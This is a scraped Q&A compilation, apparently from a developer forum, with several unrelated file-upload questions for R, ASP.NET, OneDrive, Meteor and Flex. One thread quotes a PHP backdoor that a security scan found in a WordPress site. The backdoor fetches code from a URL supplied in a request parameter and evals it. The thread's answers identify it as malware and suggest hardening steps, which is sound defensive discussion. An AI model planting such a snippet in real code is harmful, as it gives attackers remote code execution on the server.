How to upload a file to a server via FTP using R?
This should work:
library(RCurl)
ftpUpload("Localfile.html", "ftp://User:Password#FTPServer/Destination.html")
Where Localfile.html is the file to be uploaded, User indicates the user name and Password the password to log into the server while FTPServer is a placeholder for the server name and possible path to use while last but not least Destination.html is an example of the name the to be uploaded file gets on the server.
Your best bet may be the RCurl package. From the DESCRIPTION:
[...]
Additionally, the
underlying implementation is robust
and extensive, supporting
FTP/FTPS/TFTP (uploads and downloads),
Otherwise, rethink your problem. Maybe HTTP POST will do as well. It's not 1986 anymore so you're not required to use ftp.
If you can access it from the command line, then you can do:
system("ftp ...") # where ... is the argument list
You could easily wrap this in an R function if you plan on doing it often.
This probably isn't the answer you're looking for, but I solve my sharing problems by moving the file to my Public dropbox folder and link to that in my R code.
My two pennies.
Related
I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has ben installed on the server. I would be surprised if this were to be the case but wanted to be sure:
One example,
Filename: wp-admin/menu-header-cron.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET['limit'])) {\x0a eval(file_get_contents('http://' . $_GET['limit']));\x0a}
The issue type is: Backdoor:PHP/numeric.rce.8527
Description: Remote code execution malware
Looking at the file in question, the content of this file is:
<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}
Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?
Also, has was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances.
Many thanks for any input
Answers:
Yes, this is a dangerous file as already mentioned by #Everlyn Woodley. eval() is not considered safe in production at all.
Further to verify, a quick grep "isset($_GET['limit'])" on source file of latest Wordpress package tells that its not part of it, hence again a dangerous code.
Yes, someone is able to upload files on your server. Probably they have uploaded some kind of web-shell and can manipulate any file on your hosting account. Its pretty common though.
To prevent it in future (given that you have successfully cleaned your current WP install), you can do few things, (there are plenty of articles so it would be redundant) but mentioning few might not hurt here:
Install or enable mod_security on server level
Always make sure you have latest Wordpress as well plugins
Use minimal plugins.
Simple but effective: Change location of wp-plugin and theme folders.
(https://wordpress.org/support/article/editing-wp-config-php/#moving-wp-content-folder )
If you examine access log of a regular WP install, you will notice that there are tons of bots hitting with known-vulnerabilities mostly targeting plugins folder, simply changing plugins folder location along with other security measures mentioned above can significantly reduce such hacks.
That snippet is reading the limit parameter then passing is as an URL to get a file. And eval function will just execute it
So its pretty dangerous
In my asp.net web application, I read the xml file for obtaining a key. If file is not present I show a form to enter the key details and then create the file.
First problem: My app does not recognize the file even if its there.
Second problem: I am running application on the server. When writing, rather overwriting the file, browser shows the username, password prompt before writing the file. If I enter admin credentials it allows to create a file.
I have checked all possible combinations of permissions on the file / folders, but could not resolve the problem.
Any ideas, what I could be missing here?
You read the xml file but is it as a part of your solution? If yes, are you reading it through relative path i.e. are you using Server.MapPath to read it like Server.MapPath("~/Files.test.xml")? Once you use relative path, I don't think it will ask you credentials as it still is in your project directory.
It should work. I am also reading and writing files in my web application.
If it still does not work, please tell me the way you are reading file.
Thanks,
I saved a dataset in a RDS file on onedrive and made it shareable link. Now, if I use that link to read the file, I got an error.
readRDS(url("https://1drv.ms/u/s!Am3aUTxhPMS8iM4pqe5fUZbiA4m9rw"))
#> Error in readRDS(url("https://1drv.ms/u/s!Am3aUTxhPMS8iM4pqe5fUZbiA4m9rw")): unknown input format
On the other hand, if I download the file from the browser, I copy the link address and I use that one...that works.
Unfortunately, the link address obtained in that way is available only for a limited time (it doesn't work permanently).
I know googledrive and rdrop2 and so I have some workarounds,
but still...I don't understand the logic behind this.
Any help?
I am building a notes functionality with attachments in it, I have been using Meteor Uploads for file uploading. Everything works fine except for permissions. I have searched almost everything related to this but somehow I can not find a full example neither a clear answer.
There is an event shown below which is supposed to handle permission checks, but this does not run in fibre, so you have no access to collections and UserId
validateRequest: function (req, resp) {
}
There are two issues I am trying to solve:
Allow only the users that have permission to post notes, to be able to upload files.
A way to provide more secure file accessing
The first one would not exist as an issue if there was a way to call file start upload in server(As far as I know/tried it is only called in client).
Uploader.startUpload.call(Template.instance(), e);
I have made some security checks before uploading file(calling a server method) but that is in client. I have also added a cookie after opening the page which I then validate in server in order to make files not accessible out of app.
I have also read that permissions can be achieved by using tokens/secret keys as mentioned here but could not find a proper example.
PLEASE NOTE
Maybe the first issue is not a real issue in my scenario because I have permission checks when showing Note post ability but I wanted to know what is a good approach I could take.
Most important issue I believe is the second one regarding file access, what is a proper way to serve files based on User permission? Also a good way to encrypt uploading file's name so that users do not access files by guessing the file name might be helpful.
Thank you guys!
In Flex i want to upload a particular file to server form local system.how to do it?
Thanks.
You cannot upload a file without using FileReference.browse() followed by an upload(). If it was possible, that would mean that a webpage can read any file from the user's machine without his knowledge or consent.
Can you even imagine the consequences of that?
You can upload byteArrays though if you are sending some images or texts. http://developer.amazonwebservices.com/connect/thread.jspa?messageID=76422